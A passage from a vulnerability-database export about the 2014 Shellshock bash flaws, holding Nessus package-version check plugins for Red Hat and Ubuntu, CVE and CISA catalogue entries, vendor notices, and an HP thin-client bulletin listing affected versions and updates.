script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1293\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bash-3.2-33.el5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bash-3.2-33.el5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bash-3.2-33.el5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", 
reference:\"bash-debuginfo-3.2-33.el5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bash-debuginfo-3.2-33.el5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bash-debuginfo-3.2-33.el5.1\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bash-4.1.2-15.el6_5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bash-4.1.2-15.el6_5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-4.1.2-15.el6_5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bash-debuginfo-4.1.2-15.el6_5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bash-debuginfo-4.1.2-15.el6_5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-debuginfo-4.1.2-15.el6_5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bash-doc-4.1.2-15.el6_5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bash-doc-4.1.2-15.el6_5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-doc-4.1.2-15.el6_5.1\")) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bash-4.2.45-5.el7_0.2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bash-4.2.45-5.el7_0.2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bash-debuginfo-4.2.45-5.el7_0.2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bash-debuginfo-4.2.45-5.el7_0.2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bash-doc-4.2.45-5.el7_0.2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.45-5.el7_0.2\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = 
pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo / bash-doc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:13:27", "description": "Stephane Chazelas discovered that Bash incorrectly handled trailing code in function definitions. An attacker could use this issue to bypass environment restrictions, such as SSH forced command environments.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "nessus", "title": "Ubuntu 10.04 LTS / 12.04 LTS / 14.04 LTS : bash vulnerability (USN-2362-1) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:bash", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2362-1.NASL", "href": "https://www.tenable.com/plugins/nessus/77854", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2362-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77854);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\");\n script_xref(name:\"USN\", value:\"2362-1\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 12.04 LTS / 14.04 LTS : bash vulnerability (USN-2362-1) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security-related patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"Stephane Chazelas discovered that Bash incorrectly handled trailing\ncode in function definitions. An attacker could use this issue to\nbypass environment restrictions, such as SSH forced command\nenvironments.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://usn.ubuntu.com/2362-1/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2022 Canonical, Inc. / NASL script (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|12\\.04|14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 12.04 / 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"bash\", pkgver:\"4.1-2ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"bash\", pkgver:\"4.2-2ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"bash\", pkgver:\"4.3-7ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "checkpoint_security": [{"lastseen": "2023-04-20T02:09:12", "description": "\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": 
{"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2014-09-24T21:00:00", "type": "checkpoint_security", "title": "Check Point Response to CVE-2014-6271 and CVE-2014-7169 Bash Code Injection vulnerability ", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-24T21:00:00", "id": "CPS:SK102673", "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk102673", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-08-16T03:26:05", "description": "GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute code. 
This CVE correctly remediates the vulnerability in CVE-2014-6271.", "cvss3": {}, "published": "2022-01-28T00:00:00", "type": "cisa_kev", "title": "GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-28T00:00:00", "id": "CISA-KEV-CVE-2014-7169", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "paloalto": [{"lastseen": "2021-06-08T19:08:39", "description": "Palo Alto Networks has become aware of a remote code execution vulnerability in the Bash shell utility. This vulnerability (CVE-2014-6271) allows for remote code execution through multiple vectors due to the way Bash is often used on Linux systems for processing commands. 
Additional information can be found here: http://seclists.org/oss-sec/2014/q3/650 \n", "cvss3": {}, "published": "2014-09-24T00:00:00", "type": "paloalto", "title": "Bash Shell remote code execution (CVE-2014-6271, CVE-2014-7169)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2014-09-25T00:00:00", "id": "PAN-SA-2014-0004", "href": "https://securityadvisories.paloaltonetworks.com/Home/Detail/24", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2023-10-01T11:48:22", "description": "GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka \"ShellShock.\" NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2014-09-24T18:48:00", "type": "debiancve", "title": "CVE-2014-6271", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-24T18:48:00", "id": "DEBIANCVE:CVE-2014-6271", "href": "https://security-tracker.debian.org/tracker/CVE-2014-6271", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T06:25:08", "description": "GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. 
NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.", "cvss3": {}, "published": "2014-09-25T01:55:00", "type": "debiancve", "title": "CVE-2014-7169", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2014-09-25T01:55:00", "id": "DEBIANCVE:CVE-2014-7169", "href": "https://security-tracker.debian.org/tracker/CVE-2014-7169", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-01T11:48:22", "description": "GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. 
NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169.", "cvss3": {}, "published": "2014-09-27T22:55:00", "type": "debiancve", "title": "CVE-2014-6277", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-7169"], "modified": "2014-09-27T22:55:00", "id": "DEBIANCVE:CVE-2014-6277", "href": "https://security-tracker.debian.org/tracker/CVE-2014-6277", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-01T11:48:22", "description": "GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary commands via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. 
NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277.", "cvss3": {}, "published": "2014-09-30T10:55:00", "type": "debiancve", "title": "CVE-2014-6278", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169"], "modified": "2014-09-30T10:55:00", "id": "DEBIANCVE:CVE-2014-6278", "href": "https://security-tracker.debian.org/tracker/CVE-2014-6278", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04471546\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04471546\r\nVersion: 1\r\n\r\nHPSBHF03124 rev.1 - HP Thin Clients running Bash, Remote Execution of Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-10-03\r\nLast Updated: 2014-10-03\r\n\r\nPotential Security Impact: Injection of code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with certain HP Thin\r\nClients running bash. 
The vulnerabilities, known as shellshock could be\r\nexploited remotely to allow execution of code.\r\n\r\nReferences:\r\n\r\nCVE-2014-6271\r\nCVE-2014-7169\r\nSSRT101728\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nNote: all versions of HP Thin Pro and HP Smart Zero Core operating systems\r\nprior to version 5.1.0 are affected by this vulnerability. Following is a\r\ncomplete list of affected operating systems.\r\n\r\nHP ThinPro\r\n\r\nHP ThinPro 5.0 (released June 2014)\r\nHP ThinPro 4.4 (released November 2013)\r\nHP ThinPro 4.3 (released June 2013)\r\nHP ThinPro 4.2 (released November 2012)\r\nHP ThinPro 4.1 (released March 2012)\r\nHP ThinPro 3.2 (released November 2010)\r\nHP ThinPro 3.1 (released June 2010)\r\nHP ThinPro 3.0 (released November 2009)\r\nHP ThinPro 2.0 (released 2009)\r\nHP ThinPro 1.5 (released 2009)\r\nHP ThinPro 1.0 (released 2008)\r\n\r\nHP Smart Zero Core\r\n\r\nHP Smart Zero Core 5.0 (released June 2014)\r\nHP Smart Zero Core 4.4 (released November 2013)\r\nHP Smart Zero Core 4.3 (released June 2013)\r\nHP Smart Zero Core 4.2 (released November 2012)\r\nHP Smart Zero Core 4.1 (released March 2012)\r\nHP Smart Zero Core 4.0 (released March 2011)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has released the following software updates to resolve the vulnerability.\r\n\r\nProduct Affected\r\n Product Versions\r\n Patch Status\r\n\r\nHP ThinPro and HP Smart Zero Core (X86)\r\n v5.1.0 and above\r\n No update required; the Bash shell patch is incorporated into the base\r\nimage.\r\nIf you participated in the ThinPro 5.1.0 beta program upgrade to the 
release\r\nversion as soon as it becomes available.\r\n\r\nHP ThinPro and HP Smart Zero Core (x86)\r\n v5.0.x\r\n A component update is currently available through Easy Update as:\r\nSecurityUpdate-CVE20146271-CVE20147169-all-5.0-x86.xar .\r\nThe update can be also downloaded directly from ftp://ftp.hp.com/pub/tcdebian\r\n/updates/5.0/service_packs/SecurityUpdate-CVE20146271-CVE20147169-all-5.0-x86\r\n.xar\r\nOr via softpaq delivery at:\r\nftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69071.exe\r\n\r\nHP ThinPro and HP Smart Zero Core (x86)\r\n v4.4.x\r\n A component update is currently available through Easy Update as:\r\nSecurityUpdate-CVE20146271-CVE20147169-all-4.4-x86.xar .\r\nOr can be downloaded directly from ftp://ftp.hp.com/pub/tcdebian/updates/4.4/\r\nservice_packs/SecurityUpdate-CVE20146271-CVE20147169-all-4.4-x86.xar\r\nOr via softpaq delivery at:\r\nftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69071.exe\r\n\r\nHP ThinPro and HP Smart Zero Core (ARM)\r\n v4.4.x\r\n A component update is currently available through Easy Update as:\r\nSecurityUpdate-CVE20146271-CVE20147169-all-4.4-arm.xar .\r\nOr can be downloaded directly from ftp://ftp.hp.com/pub/tcdebian/updates/4.4/\r\nservice_packs/SecurityUpdate-CVE20146271-CVE20147169-all-4.4-arm.xar\r\nOr via softpaq delivery at:\r\nftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69071.exe\r\n\r\nHP ThinPro and HP Smart Zero Core\r\n v4.3x and earlier\r\n An update will be made available for customers upon request\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 03 October 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. 
